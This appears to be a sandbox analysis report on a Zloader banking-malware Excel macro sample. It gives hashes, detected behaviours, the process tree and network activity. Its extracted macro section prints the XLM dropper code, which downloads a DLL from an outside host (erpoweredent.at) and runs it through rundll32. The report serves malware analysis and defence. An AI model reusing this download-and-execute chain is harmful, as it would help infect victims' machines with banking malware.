Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

The-MALWAR...ot.exe

windows7-x64

10

The-MALWAR...ot.exe

windows10-2004-x64

10

The-MALWAR...ll.exe

windows7-x64

10

The-MALWAR...ll.exe

windows10-2004-x64

10

The-MALWAR...BS.exe

windows7-x64

10

The-MALWAR...BS.exe

windows10-2004-x64

10

The-MALWAR...in.exe

windows7-x64

7

The-MALWAR...in.exe

windows10-2004-x64

7

The-MALWAR....A.exe

windows7-x64

7

The-MALWAR....A.exe

windows10-2004-x64

7

The-MALWAR....A.exe

windows7-x64

10

The-MALWAR....A.exe

windows10-2004-x64

10

The-MALWAR....A.dll

windows7-x64

7

The-MALWAR....A.dll

windows10-2004-x64

6

The-MALWAR...r.xlsm

windows7-x64

10

The-MALWAR...r.xlsm

windows10-2004-x64

10

The-MALWAR...36c859

ubuntu-24.04-amd64

8

The-MALWAR...caa742

ubuntu-24.04-amd64

8

The-MALWAR...c1a732

ubuntu-22.04-amd64

8

The-MALWAR...57c046

ubuntu-22.04-amd64

8

The-MALWAR...4cde86

ubuntu-24.04-amd64

8

The-MALWAR...460a01

ubuntu-22.04-amd64

8

The-MALWAR...ece0c5

ubuntu-22.04-amd64

8

The-MALWAR...257619

ubuntu-22.04-amd64

8

The-MALWAR...fbcc59

ubuntu-24.04-amd64

8

The-MALWAR...54f69c

ubuntu-24.04-amd64

8

The-MALWAR...d539a6

ubuntu-22.04-amd64

8

The-MALWAR...4996dd

ubuntu-18.04-amd64

8

The-MALWAR...8232d5

ubuntu-22.04-amd64

8

The-MALWAR...66b948

ubuntu-24.04-amd64

8

The-MALWAR...f9db86

ubuntu-24.04-amd64

8

The-MALWAR...ea2485

ubuntu-22.04-amd64

8

Resubmissions

22/10/2024, 02:07 UTC

241022-cka1nssfkj 10

Analysis

  • max time kernel
    118s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    22/10/2024, 02:07 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    The-MALWARE-Repo-master/Banking-Malware/Zloader.xlsm

  • Size

    93KB

  • MD5

    b36a0543b28f4ad61d0f64b729b2511b

  • SHA1

    bf62dc338b1dd50a3f7410371bc3f2206350ebea

  • SHA256

    90c03a8ca35c33aad5e77488625598da6deeb08794e6efc9f1ddbe486df33e0c

  • SHA512

    cf691e088f9852a3850ee458ef56406ead4aea539a46f8f90eb8e300bc06612a66dfa6c9dee8dcb801e7edf7fb4ed35226a5684f4164eaad073b9511189af037

  • SSDEEP

    1536:0sqG3SkDNIVXnR8TeYSSkCXgN+Uu+j6XJaRqWD/0ACKNONUhfy:0sNrxWXnCjiubXKD/EQA

Score
10/10
discovery

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\nxTgTGh", 0)
2
=CALL("Kernel32", "CreateDirectoryA", "CJ", "C:\nxTgTGh\ECeMdPT", 0)
3
=CALL("URLMON", "URLDownloadToFileA", "JCCJJ", 0, "https://erpoweredent.at/3/zte.dll", "C:\nxTgTGh\ECeMdPT\EnVYsVZ.dll", 0, 0)
4
=CALL("INSENG", "DownloadFile", "CCJ", "https://erpoweredent.at/3/zte.dll", "C:\nxTgTGh\ECeMdPT\EnVYsVZ.dll", 1)
5
=CALL("Shell32", "ShellExecuteA", "JCCCCJ", 0, "Open", "rundll32.exe", "C:\nxTgTGh\ECeMdPT\EnVYsVZ.dll,DllRegisterServer", "0", 0)
URLs
xlm40.dropper

https://erpoweredent.at/3/zte.dll

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\The-MALWARE-Repo-master\Banking-Malware\Zloader.xlsm
    1⤵
    • Enumerates connected drives
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2884
    • C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\nxTgTGh\ECeMdPT\EnVYsVZ.dll,DllRegisterServer
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      PID:2632

Network

  • flag-us
    DNS
    erpoweredent.at
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    erpoweredent.at
    IN A
    Response
No results found
  • 8.8.8.8:53
    erpoweredent.at
    dns
    EXCEL.EXE
    61 B
     128 B
     1
    1

    DNS Request

    erpoweredent.at

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2884-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2884-1-0x0000000072A9D000-0x0000000072AA8000-memory.dmp

    Filesize

    44KB

    Download

  • memory/2884-2-0x0000000072A9D000-0x0000000072AA8000-memory.dmp

    Filesize

    44KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.